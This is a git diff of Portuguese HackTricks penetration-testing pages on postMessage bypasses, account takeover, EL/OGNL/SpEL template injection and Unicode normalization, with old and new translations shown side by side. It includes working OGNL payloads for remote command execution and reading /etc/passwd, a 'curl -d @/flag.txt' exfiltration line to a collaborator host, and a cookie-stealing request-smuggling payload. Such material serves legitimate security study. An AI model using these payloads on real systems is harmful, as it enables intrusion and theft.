* A função **`match()`**, semelhante a `search()`, processa regex. Se o regex for estruturado incorretamente, pode ser propenso a contornos.
* A função **`escapeHtml`** destina-se a sanitizar entradas escapando caracteres. No entanto, ela não cria um novo objeto escapado, mas sobrescreve as propriedades do objeto existente. Esse comportamento pode ser explorado. Especialmente, se um objeto puder ser manipulado de forma que sua propriedade controlada não reconheça `hasOwnProperty`, o `escapeHtml` não funcionará conforme o esperado. Isso é demonstrado nos exemplos abaixo:
- A função **`match()`**, semelhante a `search()`, processa regex. Se a regex for estruturada incorretamente, ela pode ser propensa a contornos.
* Falha esperada:
- A função **`escapeHtml`** é destinada a sanitizar entradas escapando caracteres. No entanto, ela não cria um novo objeto escapado, mas sobrescreve as propriedades do objeto existente. Esse comportamento pode ser explorado. Especialmente, se um objeto puder ser manipulado de forma que sua propriedade controlada não reconheça `hasOwnProperty`, o `escapeHtml` não funcionará conforme o esperado. Isso é demonstrado nos exemplos abaixo:
- Falha esperada:
```javascript
result = u({
message: "'\"<b>\\"
});
result.message // "&#39;&quot;&lt;b&gt;\"
```
* Contornando o escape:
- Contornando o escape:
```javascript
result = u(new Error("'\"<b>\\"));
result.message; // "'"<b>\"
```
No contexto dessa vulnerabilidade, o objeto `File` é notavelmente explorável devido à sua propriedade `name` somente leitura. Essa propriedade, quando usada em modelos, não é sanitizada pela função `escapeHtml`, levando a potenciais riscos de segurança.
No contexto dessa vulnerabilidade, o objeto `File` é notavelmente explorável devido à sua propriedade `name` somente leitura. Essa propriedade, quando usada em modelos, não é sanitizada pela função `escapeHtml`, levando a riscos de segurança potenciais.
* A propriedade `document.domain` em JavaScript pode ser definida por um script para encurtar o domínio, permitindo uma aplicação mais relaxada da política de mesma origem dentro do mesmo domínio pai.
- A propriedade `document.domain` em JavaScript pode ser definida por um script para encurtar o domínio, permitindo uma aplicação mais relaxada da política de mesma origem dentro do mesmo domínio pai.
### Bypass de e.origin == window.origin
### Contorno de `e.origin == window.origin`
Ao incorporar uma página da web em um **iframe isolado** usando %%%<iframe sandbox="allow-scripts" src="https://example.com/iframe.php">%%%, é crucial entender que a origem do iframe será definida como `null`. Isso é particularmente importante ao lidar com **atributos de sandbox** e suas implicações na segurança e funcionalidade.
Ao incorporar uma página da web em um **iframe isolado** usando %%%%%%, é crucial entender que a origem do iframe será definida como nula. Isso é particularmente importante ao lidar com **atributos de sandbox** e suas implicações na segurança e funcionalidade.
Ao especificar **`allow-popups`** no atributo de sandbox, qualquer janela pop-up aberta de dentro do iframe herda as restrições de sandbox de seu pai. Isso significa que, a menos que o atributo **`allow-popups-to-escape-sandbox`** também seja incluído, a origem da janela pop-up é igualmente definida como `null`, alinhando-se com a origem do iframe.
Consequentemente, quando uma pop-up é aberta nessas condições e uma mensagem é enviada do iframe para a pop-up usando **`postMessage`**, tanto o envio quanto o recebimento têm suas origens definidas como `null`. Isso leva a um cenário em que **`e.origin == window.origin`** avalia como verdadeiro (`null == null`), porque tanto o iframe quanto a pop-up compartilham o mesmo valor de origem `null`.
Para mais informações, **leia**:
Para mais informações **leia**:
{% content-ref url="bypassing-sop-with-iframes-1.md" %}
[bypassing-sop-with-iframes-1.md](bypassing-sop-with-iframes-1.md)
{% endcontent-ref %}
### Contornando `e.source`
### Contornando e.source
É possível verificar se a mensagem veio da mesma janela em que o script está ouvindo (especialmente interessante para **Scripts de Conteúdo de extensões de navegador** para verificar se a mensagem foi enviada da mesma página):
```javascript
@ -182,7 +194,7 @@ Na página a seguir, você pode ver como poderia roubar dados **sensíveis de po
### Roubo de mensagem modificando a localização do iframe
Se você puder inserir um iframe em uma página da web sem o cabeçalho X-Frame-Options que contenha outro iframe, você pode **alterar a localização desse iframe filho**, então, se estiver recebendo um **postmessage** enviado usando um **coringa**, um atacante poderia **alterar** a **origem** desse iframe para uma página **controlada** por ele e **roubar** a mensagem:
Se você puder inserir um iframe em uma página da web sem o cabeçalho X-Frame que contenha outro iframe, você pode **alterar a localização desse iframe filho**, então, se estiver recebendo um **postmessage** enviado usando um **coringa**, um atacante poderia **alterar** a **origem** desse iframe para uma página **controlada** por ele e **roubar** a mensagem:
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
@ -190,7 +202,7 @@ Se você puder inserir um iframe em uma página da web sem o cabeçalho X-Frame-
### postMessage para Poluição de Protótipo e/ou XSS
Em cenários onde os dados enviados por meio de `postMessage` são executados pelo JS, você pode **inserir um iframe** na **página** e **explorar** a **poluição de protótipo/XSS** enviando o exploit via `postMessage`.
Em cenários onde os dados enviados por meio de `postMessage` são executados por JS, você pode **inserir um iframe** na **página** e **explorar** a **poluição de protótipo/XSS** enviando o exploit via `postMessage`.
Alguns **XSS muito bem explicados através de `postMessage`** podem ser encontrados em [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
@ -212,9 +224,9 @@ setTimeout(get_code, 2000);
```
Para **mais informações**:
* Link para a página sobre [**poluição de protótipo**](../deserialization/nodejs-proto-prototype-pollution/)
* Link para a página sobre [**poluição de protótipos**](../deserialization/nodejs-proto-prototype-pollution/)
* Link para a página sobre [**XSS**](../xss-cross-site-scripting/)
* Link para a página sobre [**poluição de protótipo do lado do cliente para XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
* Link para a página sobre [**poluição de protótipos do lado do cliente para XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
## Referências
@ -222,16 +234,28 @@ Para **mais informações**:
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
* Para praticar: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater invasões de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode acessar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

90
pentesting-web/registration-vulnerabilities.md
View file

@ -1,4 +1,4 @@
# Vulnerabilidades de Registro e Assunção de Controle
# Vulnerabilidades de Registro e Apropriação
<details>
@ -6,15 +6,29 @@
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira [**produtos oficiais PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## Assunção de Controle de Registro
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Apropriação de Registro
### Registro Duplicado
@ -24,30 +38,30 @@ Outras maneiras de apoiar o HackTricks:
* \+1@
* adicione algum ponto no e-mail
* caracteres especiais no nome do e-mail (%00, %09, %20)
* Coloque caracteres em branco após o e-mail: `test@test.com a`
* Coloque caracteres em preto após o e-mail: `test@test.com a`
* vítima@gmail.com@atacante.com
* vítima@atacante.com@gmail.com
### Enumeração de Usuário
### Enumeração de Nome de Usuário
Verifique se você consegue descobrir quando um nome de usuário já foi registrado dentro da aplicação.
Verifique se você pode descobrir quando um nome de usuário já foi registrado dentro da aplicação.
### Política de Senhas
### Política de Senha
Ao criar um usuário, verifique a política de senhas (verifique se você pode usar senhas fracas).\
Ao criar um usuário, verifique a política de senha (verifique se é possível usar senhas fracas).\
Nesse caso, você pode tentar forçar credenciais.
### Injeção de SQL
[**Verifique esta página** ](sql-injection/#insert-statement)para aprender como tentar assumir contas ou extrair informações via **Injeções de SQL** em formulários de registro.
[**Verifique esta página**](sql-injection/#insert-statement) para aprender como tentar apropriação de contas ou extrair informações via **Injeções de SQL** em formulários de registro.
### Assunções de Oauth
### Apropriações de Oauth
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}
### Vulnerabilidades de SAML
### Vulnerabilidades SAML
{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
@ -60,15 +74,15 @@ Após o registro, tente alterar o e-mail e verifique se essa alteração é vali
### Mais Verificações
* Verifique se você pode usar **e-mails descartáveis**
* **Senha longa** (>200) leva a **DoS**
* Senha **longa** (>200) leva a **DoS**
* **Verifique limites de taxa na criação de contas**
* Use username@**burp\_collab**.net e analise o **callback**
## **Assunção de Controle de Redefinição de Senha**
## **Apropriação de Redefinição de Senha**
### Vazamento de Token de Redefinição de Senha Via Referenciador <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. Solicite a redefinição de senha para o seu endereço de e-mail
1. Solicite a redefinição de senha para seu endereço de e-mail
2. Clique no link de redefinição de senha
3. Não altere a senha
4. Clique em qualquer site de terceiros (por exemplo: Facebook, Twitter)
@ -110,7 +124,7 @@ email=victim@mail.com|hacker@mail.com
### Token de Redefinição de Senha Fraco <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
O token de redefinição de senha deve ser gerado aleatoriamente e único a cada vez.\
Tente determinar se o token expira ou se é sempre o mesmo, em alguns casos, o algoritmo de geração é fraco e pode ser adivinhado. As seguintes variáveis podem ser usadas pelo algoritmo.
Tente determinar se o token expira ou se é sempre o mesmo, em alguns casos o algoritmo de geração é fraco e pode ser adivinhado. As seguintes variáveis podem ser usadas pelo algoritmo.
* Timestamp
* ID do Usuário
@ -120,12 +134,12 @@ Tente determinar se o token expira ou se é sempre o mesmo, em alguns casos, o a
* Criptografia
* Apenas números
* Sequência de token pequena (caracteres entre \[A-Z,a-z,0-9])
* Reutilização de Token
* Data de expiração do Token
* Reutilização de token
* Data de expiração do token
### Vazamento de Token de Redefinição de Senha <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
1. Acione uma solicitação de redefinição de senha usando a API/UI para um e-mail específico, por exemplo: test@mail.com
1. Inicie uma solicitação de redefinição de senha usando a API/UI para um e-mail específico, por exemplo: test@mail.com
2. Inspecione a resposta do servidor e verifique o `resetToken`
3. Em seguida, use o token em uma URL como `https://exemplo.com/v3/user/password/reset?resetToken=[O_RESET_TOKEN]&email=[O_EMAIL]`
@ -141,17 +155,17 @@ Veja: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Assunção de Conta Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. Encontre um XSS dentro do aplicativo ou de um subdomínio se os cookies estiverem limitados ao domínio pai: `*.dominio.com`
2. Vaze o **cookie de sessões** atual
1. Encontre um XSS dentro da aplicação ou de um subdomínio se os cookies estiverem limitados ao domínio pai: `*.dominio.com`
2. Vaze o **cookie da sessão** atual
3. Autentique-se como o usuário usando o cookie
### Assunção de Conta Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1. Use o **smuggler** para detectar o tipo de HTTP Request Smuggling (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2. Crie uma solicitação que sobrescreverá o `POST / HTTP/1.1` com os seguintes dados:\
`GET http://algo.burpcollaborator.net HTTP/1.1 X:` com o objetivo de redirecionar os alvos para burpcollab e roubar seus cookies\
3. A solicitação final pode se parecer com o seguinte:
2. Crie uma requisição que sobrescreverá o `POST / HTTP/1.1` com os seguintes dados:\
`GET http://algo.burpcollaborator.net HTTP/1.1 X:` com o objetivo de redirecionar as vítimas para o burpcollab e roubar seus cookies\
3. A requisição final pode se parecer com o seguinte:
```
GET / HTTP/1.1
Transfer-Encoding: chunked
@ -163,21 +177,21 @@ Content-Length: 83
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone relata a exploração desse bug\
### Relatórios do Hackerone explorando esse bug\
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### Assunção de Conta via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. Criar um payload para o CSRF, por exemplo: "Formulário HTML com envio automático para alteração de senha"
2. Enviar o payload
1. Crie um payload para o CSRF, por exemplo: "Formulário HTML com envio automático para alteração de senha"
2. Envie o payload
### Assunção de Conta via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
O Token JSON Web pode ser usado para autenticar um usuário.
* Editar o JWT com outro ID de Usuário / E-mail
* Verificar a assinatura fraca do JWT
* Edite o JWT com outro ID de Usuário / E-mail
* Verifique a assinatura fraca do JWT
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
@ -187,13 +201,27 @@ O Token JSON Web pode ser usado para autenticar um usuário.
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater assunções de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo de busca de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

44
pentesting-web/ssti-server-side-template-injection/el-expression-language.md
View file

@ -4,7 +4,7 @@
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -12,6 +12,20 @@
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Informações Básicas
A Linguagem de Expressão (EL) é fundamental no JavaEE para conectar a camada de apresentação (por exemplo, páginas da web) e a lógica da aplicação (por exemplo, beans gerenciados), permitindo a interação entre eles. É predominantemente usada em:
@ -25,7 +39,7 @@ A Linguagem de Expressão (EL) é fundamental no JavaEE para conectar a camada d
- **Spring Framework**: Aplicado em vários módulos como Segurança e Dados.
- **Uso Geral**: Através da API SpEL por desenvolvedores em linguagens baseadas em JVM como Java, Kotlin e Scala.
EL está presente em tecnologias JavaEE, ambientes autônomos e é reconhecível por meio de extensões de arquivo `.jsp` ou `.jsf`, erros de pilha e termos como "Servlet" nos cabeçalhos. No entanto, suas características e o uso de certos caracteres podem depender da versão.
EL está presente em tecnologias JavaEE, ambientes autônomos e é reconhecível através das extensões de arquivo `.jsp` ou `.jsf`, erros de pilha e termos como "Servlet" nos cabeçalhos. No entanto, suas características e o uso de certos caracteres podem depender da versão.
{% hint style="info" %}
Dependendo da **versão do EL**, algumas **funcionalidades** podem estar **ativadas** ou **desativadas** e geralmente alguns **caracteres** podem ser **proibidos**.
@ -127,7 +141,7 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=%2fetc%2fpasswd
```
### Listagem de Diretórios
### Listagem de diretórios
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=..
```
@ -149,7 +163,7 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
# With HTMl entities injection inside the template
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
```
* Execução de Código Remoto **Linux**
* Execução de Código Remoto **linux**
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
@ -201,7 +215,7 @@ T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec
* `sessionScope` - variáveis de sessão
* `param.X` - valor do parâmetro onde X é o nome de um parâmetro http
Você precisará converter essas variáveis para String como:
Você precisará fazer o cast dessas variáveis para String como:
```bash
${sessionScope.toString()}
```
@ -226,14 +240,26 @@ Verifique [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](http
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking da AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma empresa de **cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me no** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

72
pentesting-web/unicode-injection/unicode-normalization.md
View file

@ -6,40 +6,52 @@
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
**Este é um resumo de: [https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)**. Confira para mais detalhes (imagens retiradas de lá).
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
## Compreensão do Unicode e Normalização
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
**Este é um resumo de:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Confira para mais detalhes (imagens retiradas de lá).
## Compreendendo Unicode e Normalização
A normalização Unicode é um processo que garante que diferentes representações binárias de caracteres sejam padronizadas para o mesmo valor binário. Esse processo é crucial ao lidar com strings em programação e processamento de dados. O padrão Unicode define dois tipos de equivalência de caracteres:
1. **Equivalência Canônica**: Os caracteres são considerados equivalentes canonicamente se tiverem a mesma aparência e significado quando impressos ou exibidos.
2. **Equivalência de Compatibilidade**: Uma forma mais fraca de equivalência onde os caracteres podem representar o mesmo caractere abstrato, mas podem ser exibidos de forma diferente.
Existem **quatro algoritmos de normalização Unicode**: NFC, NFD, NFKC e NFKD. Cada algoritmo emprega técnicas de normalização canônica e de compatibilidade de maneiras diferentes. Para uma compreensão mais aprofundada, você pode explorar essas técnicas em [Unicode.org](https://unicode.org/).
Existem **quatro algoritmos de normalização Unicode**: NFC, NFD, NFKC e NFKD. Cada algoritmo emprega técnicas de normalização canônica e de compatibilidade de maneiras diferentes. Para entender mais a fundo, você pode explorar essas técnicas em [Unicode.org](https://unicode.org/).
### Pontos-chave sobre Codificação Unicode
